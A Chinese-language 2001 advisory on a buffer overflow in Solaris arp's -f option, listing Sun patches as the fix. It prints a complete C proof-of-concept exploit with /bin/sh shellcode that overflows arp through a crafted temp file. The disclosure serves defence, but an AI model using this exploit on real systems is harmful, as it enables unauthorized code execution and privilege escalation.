Solaris arp 存在缓冲溢出漏洞发布时间:2001-01-13 更新时间:2001-01-13 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Sun Solaris 7.0_x86详细描述 arp用来查看和管理包含网络硬件地址映射表的工具,为了方便,SOLARIS ARP支持一个选项(-f参数)可以插入多个包含在文件中的条目。这个文件的值将会通过sscanf()作为字符串来展开。但是,其没有保证这些长度要不能超过本地变量所分配给它们的空间。这样就存在覆盖堆栈和破坏程序的可能。这个漏洞可以导致以"bin"的身份执行任意代码。 测试代码 #include <fcntl.h> /* arpexp.c arp overflow proof of concept by ahmed@securityfocus.com tested on x86 solaris 7,8beta default should work. if not, arg1 = offset. +- by 100's Copyright Security-Focus.com, 11/2000 */ long get_esp() { __asm__("movl %esp,%eax"); } int main(int ac, char **av) { char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff" "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46" "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0" "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52" "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff" "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08" "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b" "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8" "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68\xff\xff\xff\xff\xff\xff\xff" "\xff\xff"; unsigned long magic = 0x8047b78; unsigned long r = get_esp() + 600; unsigned char buf[300]; int f; if (ac == 2) r += atoi(av[1]); memset(buf,0x61,sizeof(buf)); memcpy(buf+52,&magic,4); memcpy(buf+76,&r,4); f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600); write(f,"1 2 3 4 ",8); write(f,buf,sizeof(buf)); close(f); memset(buf,0x90,sizeof(buf)); memcpy(buf,"LOL=",4); memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell)); putenv(buf); system("/usr/sbin/arp -f /tmp/ypx"); unlink("/tmp/ypx"); } 解决方案 采用下列补丁: Sun Solaris 7.0_x86: Sun patch 109710-01 Sun Solaris 7.0: Sun patch 109709-01 Sun Solaris 2.6_x86: Sun patch 109720-01 Sun Solaris 2.6: Sun patch 109719-01 Sun Solaris 2.5.1_x86: Sun patch 109722-01 Sun Solaris 2.5.1: Sun patch 109721-01 Sun Solaris 2.5_x86: Sun patch 109708-01 Sun Solaris 2.5: Sun patch 109707-01 Sun Solaris 2.4_x86: Sun patch 109724-01 Sun Solaris 2.4: Sun patch 109723-01 相关信息 |
